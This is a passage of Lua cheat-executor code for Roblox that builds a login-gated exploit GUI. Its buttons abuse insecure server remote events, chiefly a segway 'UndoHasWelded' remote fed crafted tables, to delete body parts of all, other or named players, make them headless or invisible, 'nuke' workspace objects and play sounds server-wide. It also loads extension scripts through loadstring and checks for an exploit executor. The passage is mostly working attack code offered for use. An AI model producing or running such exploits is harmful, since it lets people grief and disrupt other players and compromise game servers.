string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c slaves:FireServer(ohok, {Value = ohok}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text), {Value = game:GetService("Players"):FindFirstChild(target.Text)}) end end) nuke.MouseButton1Down:connect(function() for i,c in pairs(game:GetService("Workspace"):GetChildren()) do ohok = c slaves:FireServer(ohok, {Value = ohok}) end end) end end end }) GUIS:AddButton({ Title = "Bru GUI", Description = "like harked", Callback = function() -- bru 2.3.0 -- reggie#1000 if not game:IsLoaded() then game.Loaded:Wait() -- repeat task.wait() until game:IsLoaded() == true end -- Services local Lighting = game:GetService('Lighting') local Players = game:GetService('Players') local UserInputService = game:GetService('UserInputService') local TweenService = game:GetService('TweenService') local ReplicatedStorage = game:GetService('ReplicatedStorage') local LocalPlayer = Players.LocalPlayer local CoreGui = game:GetService('CoreGui') local Keys = { [''] = '', } local Authenticated = false local function RandomStr(Args) local FullString = '' local CharacterList = 'abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ' local Length = 20 for i = 1, Length do local CharacterNumber = math.random(1, string.len(CharacterList)) local DecidedCharacter = CharacterList:sub(CharacterNumber, CharacterNumber) FullString = FullString .. DecidedCharacter end return FullString end local function DragElement(DragFrame, FrameToDrag, DragSpeed) local DragToggle = nil local DragInput = nil local DragStart = nil local DragPos = nil local StartPos = nil local function UpdateInput(Input) local Delta = Input.Position - DragStart local Position = UDim2.new(StartPos.X.Scale, StartPos.X.Offset + Delta.X, StartPos.Y.Scale, StartPos.Y.Offset + Delta.Y) TweenService:Create(FrameToDrag, TweenInfo.new(DragSpeed), {Position = Position}):Play() end DragFrame.InputBegan:Connect(function(Input) if (Input.UserInputType == Enum.UserInputType.MouseButton1 or Input.UserInputType == Enum.UserInputType.Touch) and UserInputService:GetFocusedTextBox() == nil then DragToggle = true DragStart = Input.Position StartPos = FrameToDrag.Position Input.Changed:Connect(function() if Input.UserInputState == Enum.UserInputState.End then DragToggle = false end end) end end) DragFrame.InputChanged:Connect(function(Input) if Input.UserInputType == Enum.UserInputType.MouseMovement or Input.UserInputType == Enum.UserInputType.Touch then DragInput = Input end end) UserInputService.InputChanged:Connect(function(Input) if Input == DragInput and DragToggle then UpdateInput(Input) end end) end -- Base UI local BruUI = { ScreenGui = Instance.new('ScreenGui'), FrameHolder = Instance.new('Frame'), Topbar = Instance.new('Frame'), TopbarStatus = Instance.new('Frame'), TopbarStatusCommandCount = Instance.new('TextLabel'), TopbarStatusLogin = Instance.new('TextLabel'), TopbarStatusWatermark = Instance.new('TextLabel'), TopbarTitle = Instance.new('TextLabel'), Body = Instance.new('Frame'), LoginFrame = Instance.new('Frame'), LoginFramePasswordTextBox = Instance.new('TextBox'), LoginFrameUsernameTextBox = Instance.new('TextBox'), LoginFrameSubmitButton = Instance.new('TextButton'), LoginFrameCorrectLabel = Instance.new('TextLabel'), LoginFrameIncorrectLabel = Instance.new('TextLabel'), } for i,v in pairs(BruUI) do v.Name = RandomStr() v.Archivable = false end BruUI.ScreenGui.DisplayOrder = 2147483647 BruUI.ScreenGui.IgnoreGuiInset = true BruUI.ScreenGui.ResetOnSpawn = false BruUI.ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Global BruUI.FrameHolder.AnchorPoint = Vector2.new(0.5, 0.5) BruUI.FrameHolder.BackgroundColor3 = Color3.fromRGB(20,20,20) BruUI.FrameHolder.BackgroundTransparency = 0.2 BruUI.FrameHolder.BorderSizePixel = 0 BruUI.FrameHolder.Position = UDim2.new(0.5, 0, 0.5, 0) BruUI.FrameHolder.Size = UDim2.new(0, 250, 0, 309) BruUI.FrameHolder.ClipsDescendants = true BruUI.FrameHolder.Parent = BruUI.ScreenGui BruUI.Topbar.Active = true BruUI.Topbar.BackgroundTransparency = 0.9 BruUI.Topbar.BorderSizePixel = 0 BruUI.Topbar.Size = UDim2.new(1, 0, 0, 45) BruUI.Topbar.ZIndex = 2 BruUI.Topbar.Parent = BruUI.FrameHolder BruUI.TopbarStatus.BackgroundTransparency = 0.9 BruUI.TopbarStatus.BorderSizePixel = 0 BruUI.TopbarStatus.Position = UDim2.new(0, 0, 1, -15) BruUI.TopbarStatus.Size = UDim2.new(1, 0, 0, 15) BruUI.TopbarStatus.ZIndex = 3 BruUI.TopbarStatus.Parent = BruUI.Topbar BruUI.TopbarStatusCommandCount.BackgroundTransparency = 1 BruUI.TopbarStatusCommandCount.Position = UDim2.new(1, -120, 0, 0) BruUI.TopbarStatusCommandCount.Size = UDim2.new(0, 108, 1, 0) BruUI.TopbarStatusCommandCount.ZIndex = 4 BruUI.TopbarStatusCommandCount.Visible = false BruUI.TopbarStatusCommandCount.Font = Enum.Font.SourceSans BruUI.TopbarStatusCommandCount.Text = 'Commands: 0' BruUI.TopbarStatusCommandCount.TextColor3 = Color3.fromRGB(220,220,220) BruUI.TopbarStatusCommandCount.TextSize = 14 BruUI.TopbarStatusCommandCount.TextXAlignment = Enum.TextXAlignment.Right BruUI.TopbarStatusCommandCount.Parent = BruUI.TopbarStatus BruUI.TopbarStatusLogin.BackgroundTransparency = 1 BruUI.TopbarStatusLogin.Position = UDim2.new(1, -120, 0, 0) BruUI.TopbarStatusLogin.Size = UDim2.new(0, 108, 1, 0) BruUI.TopbarStatusLogin.ZIndex = 4 BruUI.TopbarStatusLogin.Font = Enum.Font.SourceSans BruUI.TopbarStatusLogin.Text = 'Login' BruUI.TopbarStatusLogin.TextColor3 = Color3.fromRGB(220,220,220) BruUI.TopbarStatusLogin.TextSize = 14 BruUI.TopbarStatusLogin.TextXAlignment = Enum.TextXAlignment.Right BruUI.TopbarStatusLogin.Parent = BruUI.TopbarStatus BruUI.TopbarStatusWatermark.BackgroundTransparency = 1 BruUI.TopbarStatusWatermark.Position = UDim2.new(0, 12, 0, 0) BruUI.TopbarStatusWatermark.Size = UDim2.new(0, 71, 1, 0) BruUI.TopbarStatusWatermark.ZIndex = 4 BruUI.TopbarStatusWatermark.Font = Enum.Font.SourceSans BruUI.TopbarStatusWatermark.Text = 'reggie#1000 & xaro#2846' BruUI.TopbarStatusWatermark.TextColor3 = Color3.fromRGB(220,220,220) BruUI.TopbarStatusWatermark.TextSize = 14 BruUI.TopbarStatusWatermark.TextXAlignment = Enum.TextXAlignment.Left BruUI.TopbarStatusWatermark.Parent = BruUI.TopbarStatus BruUI.TopbarTitle.BackgroundTransparency = 1 BruUI.TopbarTitle.Position = UDim2.new(0, 0, 0, 2) BruUI.TopbarTitle.Size = UDim2.new(1, 0, 1, -17) BruUI.TopbarTitle.ZIndex = 3 BruUI.TopbarTitle.Font = Enum.Font.SourceSans BruUI.TopbarTitle.Text = 'bru' BruUI.TopbarTitle.TextColor3 = Color3.fromRGB(235,235,235) BruUI.TopbarTitle.TextSize = 28 BruUI.TopbarTitle.Parent = BruUI.Topbar BruUI.Body.BackgroundTransparency = 1 BruUI.Body.Position = UDim2.new(0, 0, 0, 45) BruUI.Body.Size = UDim2.new(1, 0, 1, -45) BruUI.Body.ZIndex = 2 BruUI.Body.ClipsDescendants = true BruUI.Body.Parent = BruUI.FrameHolder BruUI.LoginFrame.BackgroundTransparency = 1 BruUI.LoginFrame.Size = UDim2.new(1, 0, 1, 0) BruUI.LoginFrame.ZIndex = 3 BruUI.LoginFrame.Parent = BruUI.Body BruUI.LoginFramePasswordTextBox.BackgroundColor3 = Color3.fromRGB(200,200,200) BruUI.LoginFramePasswordTextBox.BackgroundTransparency = 0.7 BruUI.LoginFramePasswordTextBox.BorderSizePixel = 0 BruUI.LoginFramePasswordTextBox.ClearTextOnFocus = false BruUI.LoginFramePasswordTextBox.Position = UDim2.new(0, 12, 0, 64) BruUI.LoginFramePasswordTextBox.Size = UDim2.new(1, -24, 0, 40) BruUI.LoginFramePasswordTextBox.ZIndex = 4 BruUI.LoginFramePasswordTextBox.Font = Enum.Font.SourceSansSemibold BruUI.LoginFramePasswordTextBox.PlaceholderColor3 = Color3.fromRGB(170,170,170) BruUI.LoginFramePasswordTextBox.PlaceholderText = 'Password' BruUI.LoginFramePasswordTextBox.Text = '' BruUI.LoginFramePasswordTextBox.TextColor3 = Color3.fromRGB(220,220,200) BruUI.LoginFramePasswordTextBox.TextSize = 18 BruUI.LoginFramePasswordTextBox.TextWrapped = true BruUI.LoginFramePasswordTextBox.Parent = BruUI.LoginFrame BruUI.LoginFrameUsernameTextBox.BackgroundColor3 = Color3.fromRGB(200,200,200) BruUI.LoginFrameUsernameTextBox.BackgroundTransparency = 0.7 BruUI.LoginFrameUsernameTextBox.BorderSizePixel = 0 BruUI.LoginFrameUsernameTextBox.ClearTextOnFocus = false BruUI.LoginFrameUsernameTextBox.Position = UDim2.new(0, 12, 0, 12) BruUI.LoginFrameUsernameTextBox.Size = UDim2.new(1, -24, 0, 40) BruUI.LoginFrameUsernameTextBox.ZIndex = 4 BruUI.LoginFrameUsernameTextBox.Font = Enum.Font.SourceSansSemibold BruUI.LoginFrameUsernameTextBox.PlaceholderColor3 = Color3.fromRGB(170,170,170) BruUI.LoginFrameUsernameTextBox.PlaceholderText = 'Username' BruUI.LoginFrameUsernameTextBox.Text = '' BruUI.LoginFrameUsernameTextBox.TextColor3 = Color3.fromRGB(220,220,200) BruUI.LoginFrameUsernameTextBox.TextSize = 18 BruUI.LoginFrameUsernameTextBox.TextWrapped = true BruUI.LoginFrameUsernameTextBox.Parent = BruUI.LoginFrame BruUI.LoginFrameSubmitButton.BackgroundColor3 = Color3.fromRGB(200,200,200) BruUI.LoginFrameSubmitButton.BackgroundTransparency = 0.7 BruUI.LoginFrameSubmitButton.BorderSizePixel = 0 BruUI.LoginFrameSubmitButton.Position = UDim2.new(0, 12, 1, -54) BruUI.LoginFrameSubmitButton.Size = UDim2.new(1, -24, 0, 40) BruUI.LoginFrameSubmitButton.ZIndex = 4 BruUI.LoginFrameSubmitButton.Font = Enum.Font.SourceSansSemibold BruUI.LoginFrameSubmitButton.Text = 'Submit' BruUI.LoginFrameSubmitButton.TextColor3 = Color3.fromRGB(220,220,200) BruUI.LoginFrameSubmitButton.TextSize = 18 BruUI.LoginFrameSubmitButton.TextWrapped = true BruUI.LoginFrameSubmitButton.Parent = BruUI.LoginFrame BruUI.LoginFrameCorrectLabel.BackgroundTransparency = 1 BruUI.LoginFrameCorrectLabel.Position = UDim2.new(0, 0, 1, -70) BruUI.LoginFrameCorrectLabel.Size = UDim2.new(1, 0, 0, 10) BruUI.LoginFrameCorrectLabel.ZIndex = 4 BruUI.LoginFrameCorrectLabel.Visible = false BruUI.LoginFrameCorrectLabel.Font = Enum.Font.SourceSansSemibold BruUI.LoginFrameCorrectLabel.Text = 'Authenticated successfully, please wait.' BruUI.LoginFrameCorrectLabel.TextColor3 = Color3.fromRGB(46,204,113) BruUI.LoginFrameCorrectLabel.TextSize = 14 BruUI.LoginFrameCorrectLabel.Parent = BruUI.LoginFrame BruUI.LoginFrameIncorrectLabel.BackgroundTransparency = 1 BruUI.LoginFrameIncorrectLabel.Position = UDim2.new(0, 0, 1, -70) BruUI.LoginFrameIncorrectLabel.Size = UDim2.new(1, 0, 0, 10) BruUI.LoginFrameIncorrectLabel.ZIndex = 4 BruUI.LoginFrameIncorrectLabel.Visible = false BruUI.LoginFrameIncorrectLabel.Font = Enum.Font.SourceSansSemibold BruUI.LoginFrameIncorrectLabel.Text = 'Username or password is incorrect.' BruUI.LoginFrameIncorrectLabel.TextColor3 = Color3.fromRGB(255,82,66) BruUI.LoginFrameIncorrectLabel.TextSize = 14 BruUI.LoginFrameIncorrectLabel.Parent = BruUI.LoginFrame DragElement(BruUI.Topbar, BruUI.FrameHolder, 0) BruUI.LoginFrameSubmitButton.MouseButton1Click:Connect(function() for a,b in pairs(Keys) do if string.lower(BruUI.LoginFrameUsernameTextBox.Text) == a and string.lower(BruUI.LoginFramePasswordTextBox.Text) == b then Authenticated = true BruUI.LoginFrameIncorrectLabel.Visible = false BruUI.LoginFrameCorrectLabel.Visible = true wait(1) -- Dashboard UI local DashboardUI = { Dashboard = Instance.new('Frame'), Buttons = Instance.new('ScrollingFrame'), UIGridLayout = Instance.new('UIGridLayout'), ValueBox = Instance.new('TextBox'), } for i,v in pairs(DashboardUI) do v.Name = RandomStr() v.Archivable = false end DashboardUI.Dashboard.BackgroundTransparency = 1 DashboardUI.Dashboard.Position = UDim2.new(1, 0, 0, 0) DashboardUI.Dashboard.Size = UDim2.new(1, 0, 1, 0) DashboardUI.Dashboard.ZIndex = 3 DashboardUI.Dashboard.ClipsDescendants = true DashboardUI.Buttons.BorderSizePixel = 0 DashboardUI.Buttons.BackgroundTransparency = 1 DashboardUI.Buttons.Position = UDim2.new(0, 12, 0, 12) DashboardUI.Buttons.Size = UDim2.new(1, -24, 1, -76) DashboardUI.Buttons.ZIndex = 4 DashboardUI.Buttons.ClipsDescendants = true DashboardUI.Buttons.AutomaticCanvasSize = Enum.AutomaticSize.Y DashboardUI.Buttons.CanvasSize = UDim2.new(0, 0, 0, 0) DashboardUI.Buttons.BottomImage = 'rbxasset://textures/ui/Scroll/scroll-middle.png' DashboardUI.Buttons.MidImage = 'rbxasset://textures/ui/Scroll/scroll-middle.png' DashboardUI.Buttons.TopImage = 'rbxasset://textures/ui/Scroll/scroll-middle.png' DashboardUI.Buttons.ScrollBarThickness = 8 DashboardUI.Buttons.ScrollingDirection = Enum.ScrollingDirection.Y DashboardUI.Buttons.Parent = DashboardUI.Dashboard DashboardUI.UIGridLayout.CellPadding = UDim2.new(0, 11, 0, 11) DashboardUI.UIGridLayout.CellSize = UDim2.new(0, 107, 0, 40) DashboardUI.UIGridLayout.Parent = DashboardUI.Buttons DashboardUI.ValueBox.BackgroundColor3 = Color3.fromRGB(200,200,200) DashboardUI.ValueBox.BackgroundTransparency = 0.7 DashboardUI.ValueBox.BorderSizePixel = 0 DashboardUI.ValueBox.Position = UDim2.new(0, 12, 1, -52) DashboardUI.ValueBox.Size = UDim2.new(1, -24, 0, 40) DashboardUI.ValueBox.ZIndex = 4 DashboardUI.ValueBox.ClipsDescendants = true DashboardUI.ValueBox.Font = Enum.Font.SourceSansSemibold DashboardUI.ValueBox.PlaceholderColor3 = Color3.fromRGB(170,170,170) DashboardUI.ValueBox.PlaceholderText = 'Value' DashboardUI.ValueBox.Text = '' DashboardUI.ValueBox.TextColor3 = Color3.fromRGB(220,220,200) DashboardUI.ValueBox.TextSize = 18 DashboardUI.ValueBox.TextWrapped = true DashboardUI.ValueBox.Parent = DashboardUI.Dashboard DashboardUI.Dashboard.Parent = BruUI.Body BruUI.LoginFrame:TweenPosition(UDim2.new(-1, 0, 0, 0), Enum.EasingDirection.In, Enum.EasingStyle.Back, 0.7) wait(0.7) BruUI.LoginFrame:Destroy() DashboardUI.Dashboard:TweenPosition(UDim2.new(0, 0, 0, 0), Enum.EasingDirection.Out, Enum.EasingStyle.Back, 0.7) wait(0.8) BruUI.TopbarStatusLogin.Visible = false BruUI.TopbarStatusCommandCount.Visible = true local Buttons = {} local Bru = {} local Commands = {} Bru.Username = a Bru.CommandCount = #Commands Bru.Input = DashboardUI.ValueBox.Text local function UpdateCommandCount() BruUI.TopbarStatusCommandCount.Text = 'Commands: ' .. tostring(#DashboardUI.Buttons:GetChildren() - 1) end DashboardUI.Buttons.ChildAdded:Connect(UpdateCommandCount) DashboardUI.Buttons.ChildRemoved:Connect(UpdateCommandCount) function Bru:AddButton(Name, OnClicked) local ReturnTable = {} local Button = Instance.new('TextButton') Button.Name = RandomStr() Button.Archivable = false Button.AutoButtonColor = true Button.BackgroundColor3 = Color3.new(200,200,200) Button.BackgroundTransparency = 0.7 Button.BorderSizePixel = 0 Button.ZIndex = 5 Button.Font = Enum.Font.SourceSansSemibold Button.Text = tostring(Name) Button.TextColor3 = Color3.fromRGB(220,220,220) Button.TextSize = 18 Button.TextScaled = false Button.TextWrapped = true Button.Parent = DashboardUI.Buttons Button.MouseButton1Click:Connect(function() local Command = Instance.new('StringValue') Command.Value = DashboardUI.ValueBox.Text OnClicked(Command.Value) end) function ReturnTable:Destroy() Button:Destroy() OnClicked = function() end end return ReturnTable end function Bru:AddToggle(Name, OnClicked) local ReturnTable = {} local Button = Instance.new('TextButton') Button.Name = RandomStr() Button.Archivable = false Button.AutoButtonColor = true Button.BackgroundColor3 = Color3.new(200,200,200) Button.BackgroundTransparency = 0.7 Button.BorderSizePixel = 0 Button.ZIndex = 5 Button.Font = Enum.Font.SourceSansSemibold Button.Text = tostring(Name) Button.TextColor3 = Color3.fromRGB(220,220,220) Button.TextSize = 18 Button.TextScaled = false Button.TextWrapped = true Button.Parent = DashboardUI.Buttons local function ToggleButton(Bool) if not Bool then -- nil if Button.BackgroundTransparency == 0.7 then Bool = true elseif Button.BackgroundTransparency == 0.5 then Bool = false end end if Bool == true then Button.BackgroundTransparency = 0.5 else -- also if it's none lol Button.BackgroundTransparency = 0.7 end local Command = Instance.new('StringValue') Command.Value = DashboardUI.ValueBox.Text return { BoolSet = Bool, CommandValue = Command.Value, } end Button.MouseButton1Click:Connect(function() local ToggleStatus = ToggleButton() OnClicked(ToggleStatus.CommandValue, ToggleStatus.BoolSet) end) function ReturnTable:Destroy() Button:Destroy() OnClicked = function() end end function ReturnTable:Toggle(...) -- Bool local ToggleStatus = ToggleButton(...) return {ToggleStatus.CommandValue, ToggleStatus.BoolSet} end return ReturnTable end -- Extensions if readfile and isfolder and listfiles and makefolder then pcall(function() if isfolder('Bru Extensions') then for _, BruExtensionName in pairs(listfiles('Bru Extensions')) do if BruExtensionName:sub(-4) == '.bru' then pcall(function() local LoadFunc = loadstring(readfile('Bru Extensions\\' .. BruExtension), {}) local LoadFuncEnv = getfenv(LoadFunc) LoadFuncEnv.Bru = Bru setfenv(LoadFunc, LoadFuncEnv) LoadFunc() end) end end else makefolder('Bru Extensions') end end) end local GameFuncs = { [292628125] = function() -- Keystone local BoomboxRemote = ReplicatedStorage:FindFirstChild('Boombox') local NickRemote = ReplicatedStorage:FindFirstChild('Nickname') Bru:AddButton('Play Sound', function(Command) local SoundId = tonumber(Command) if SoundId then repeat task.wait() until BoomboxRemote BoomboxRemote:FireServer(SoundId) end end) Bru:AddButton('Stop Sound', function() repeat task.wait() until BoomboxRemote BoomboxRemote:FireServer(1) end) end, } for i,v in pairs(GameFuncs) do if i == game.PlaceId then pcall(v) end end -- Segway Stuff pcall(function() local Segways = {} local MySegways = {} local function GetSegway() local DecidedSegway = nil if #MySegways >= 1 then for _, Segway in pairs(MySegways) do if Segway.Parent ~= nil and (Segway:IsDescendantOf(workspace) or Segway:IsDescendantOf(Lighting) or Segway:IsDescendantOf(Players)) then DecidedSegway = Segway end end end if DecidedSegway == nil then for _, Segway in pairs(Segways) do if Segway.Parent ~= nil and (Segway:IsDescendantOf(workspace) or Segway:IsDescendantOf(Lighting) or Segway:IsDescendantOf(Players)) then DecidedSegway = Segway end end end return DecidedSegway -- if not decided, returns nil end local FlattenButton = Bru:AddButton('Flatten', function(CommandValue) local Segway = GetSegway() if Segway then local UndoHasWeldedRemote = Segway.RemoteEvents:FindFirstChild('UndoHasWelded') if UndoHasWeldedRemote then if UndoHasWeldedRemote.ClassName == 'RemoteEvent' then if CommandValue:lower():sub(1, 3) == 'all' then for _, Player in pairs(Players:GetPlayers()) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyDepthScale }, Name = 'Seater' } }) end) end end elseif CommandValue:lower():sub(1, 6) == 'others' then for _, Player in pairs(Players:GetPlayers()) do if Player ~= LocalPlayer and Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyDepthScale }, Name = 'Seater' } }) end) end end elseif #CommandValue >= 1 then local PlayersChosen = {} for _, Player in pairs(Players:GetPlayers()) do if Player.Name:lower():sub(1, #CommandValue) == CommandValue:lower() then table.insert(PlayersChosen, Player) end end for _, Player in pairs(PlayersChosen) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyDepthScale }, Name = 'Seater' } }) end) end end end end end end end) local StickButton = Bru:AddButton('Stick', function(CommandValue) local Segway = GetSegway() if Segway then local UndoHasWeldedRemote = Segway.RemoteEvents:FindFirstChild('UndoHasWelded') if UndoHasWeldedRemote then if UndoHasWeldedRemote.ClassName == 'RemoteEvent' then if CommandValue:lower():sub(1, 3) == 'all' then for _, Player in pairs(Players:GetPlayers()) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyDepthScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyWidthScale }, Name = 'Seater' } }) end) end end elseif CommandValue:lower():sub(1, 6) == 'others' then for _, Player in pairs(Players:GetPlayers()) do if Player ~= LocalPlayer and Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyDepthScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyWidthScale }, Name = 'Seater' } }) end) end end elseif #CommandValue >= 1 then local PlayersChosen = {} for _, Player in pairs(Players:GetPlayers()) do if Player.Name:lower():sub(1, #CommandValue) == CommandValue:lower() then table.insert(PlayersChosen, Player) end end for _, Player in pairs(PlayersChosen) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyDepthScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyWidthScale }, Name = 'Seater' } }) end) end end end end end end end) local RemoveBodyButton = Bru:AddButton('Remove Body', function(CommandValue) local Segway = GetSegway() if Segway then local UndoHasWeldedRemote = Segway.RemoteEvents:FindFirstChild('UndoHasWelded') if UndoHasWeldedRemote then if UndoHasWeldedRemote.ClassName == 'RemoteEvent' then if CommandValue:lower():sub(1, 3) == 'all' then for _, Player in pairs(Players:GetPlayers()) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyHeightScale }, Name = 'Seater' } }) end) end end elseif CommandValue:lower():sub(1, 6) == 'others' then for _, Player in pairs(Players:GetPlayers()) do if Player ~= LocalPlayer and Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyHeightScale }, Name = 'Seater' } }) end) end end elseif #CommandValue >= 1 then local PlayersChosen = {} for _, Player in pairs(Players:GetPlayers()) do if Player.Name:lower():sub(1, #CommandValue) == CommandValue:lower() then table.insert(PlayersChosen, Player) end end for _, Player in pairs(PlayersChosen) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyHeightScale }, Name = 'Seater' } }) end) end end end end end end end) local HeadlessButton = Bru:AddButton('Headless', function(CommandValue) local Segway = GetSegway() if Segway then local UndoHasWeldedRemote = Segway.RemoteEvents:FindFirstChild('UndoHasWelded') if UndoHasWeldedRemote then if UndoHasWeldedRemote.ClassName == 'RemoteEvent' then if CommandValue:lower():sub(1, 3) == 'all' then for _, Player in pairs(Players:GetPlayers()) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').HeadScale }, Name = 'Seater' } }) end) end end elseif CommandValue:lower():sub(1, 6) == 'others' then for _, Player in pairs(Players:GetPlayers()) do if Player ~= LocalPlayer and Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').HeadScale }, Name = 'Seater' } }) end) end end elseif #CommandValue >= 1 then local PlayersChosen = {} for _, Player in pairs(Players:GetPlayers()) do if Player.Name:lower():sub(1, #CommandValue) == CommandValue:lower() then table.insert(PlayersChosen, Player) end end for _, Player in pairs(PlayersChosen) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').HeadScale }, Name = 'Seater' } }) end) end end end end end end end) local InvisibleButton = Bru:AddButton('Invisible', function(CommandValue) local Segway = GetSegway() if Segway then local UndoHasWeldedRemote = Segway.RemoteEvents:FindFirstChild('UndoHasWelded') if UndoHasWeldedRemote then if UndoHasWeldedRemote.ClassName == 'RemoteEvent' then if CommandValue:lower():sub(1, 3) == 'all' then for _, Player in pairs(Players:GetPlayers()) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').HeadScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyHeightScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyWidthScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyDepthScale }, Name = 'Seater' } }) end) end end elseif CommandValue:lower():sub(1, 6) == 'others' then for _, Player in pairs(Players:GetPlayers()) do if Player ~= LocalPlayer and Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').HeadScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyHeightScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyWidthScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyWidthScale }, Name = 'Seater' } }) end) end end elseif #CommandValue >= 1 then local PlayersChosen = {} for _, Player in pairs(Players:GetPlayers()) do if Player.Name:lower():sub(1, #CommandValue) == CommandValue:lower() then table.insert(PlayersChosen, Player) end end for _, Player in pairs(PlayersChosen) do if Player.Character then pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').HeadScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyHeightScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyWidthScale }, Name = 'Seater' } }) end) pcall(function() UndoHasWeldedRemote:FireServer({ Value = { Parent = { HasWelded = Player.Character:FindFirstChildWhichIsA('Humanoid').BodyWidthScale }, Name = 'Seater' } }) end) end end end end end end end) local ViewButton = Bru:AddButton('View', function(CommandValue) if #CommandValue >= 1 then local ChosenPlayer = nil for _, Player in pairs(Players:GetPlayers()) do if Player.Name:lower():sub(1, #CommandValue) == CommandValue:lower() then ChosenPlayer = Player end end if ChosenPlayer then if ChosenPlayer.Character then pcall(function() game:GetService("Workspace").CurrentCamera.CameraSubject = ChosenPlayer.Character:FindFirstChildWhichIsA('Humanoid') end) end end end end) local UnviewButton = Bru:AddButton('Unview', function(CommandValue) if LocalPlayer.Character then pcall(function() game:GetService("Workspace").CurrentCamera.CameraSubject = LocalPlayer.Character:FindFirstChildWhichIsA('Humanoid') end) end end) -- Add segways !!!111 Lighting.DescendantAdded:Connect(function(Descendant) if Descendant.Name == 'HandlessSegway' then if not Segways[table.find(Segways, Descendant)] then table.insert(Segways, #Segways + 1, Descendant) end end end) for _, Descendant in pairs(Lighting:GetDescendants()) do if Descendant.Name == 'HandlessSegway' then if not Segways[table.find(Segways, Descendant)] then table.insert(Segways, #Segways + 1, Descendant) end end end for _, Player in pairs(Players:GetPlayers()) do local Segways = Segways -- if the player is localplayer, we want the chooser to default to that if Player == LocalPlayer then Segways = MySegways end Player.Backpack.DescendantAdded:Connect(function(Descendant) if Descendant.Name == 'HandlessSegway' then if not Segways[table.find(Segways, Descendant)] then table.insert(Segways, #Segways + 1, Descendant) end end end) Player.CharacterAdded:Connect(function(Char) Char.DescendantAdded:Connect(function(Descendant) if Descendant.Name == 'HandlessSegway' then if not Segways[table.find(Segways, Descendant)] then table.insert(Segways, #Segways + 1, Descendant) end end end) end) for _, Descendant in pairs(Player.Backpack:GetDescendants()) do if Descendant.Name == 'HandlessSegway' then if not Segways[table.find(Segways, Descendant)] then table.insert(Segways, #Segways + 1, Descendant) end end end if Player.Character then for _, Descendant in pairs(Player.Character:GetDescendants()) do if Descendant.Name == 'HandlessSegway' then if not Segways[table.find(Segways, Descendant)] then table.insert(Segways, #Segways + 1, Descendant) end end end end end end) elseif Authenticated ~= true then BruUI.LoginFrameIncorrectLabel.Visible = true end end end) -- Parent base UI after unpacking. if syn then pcall(function() 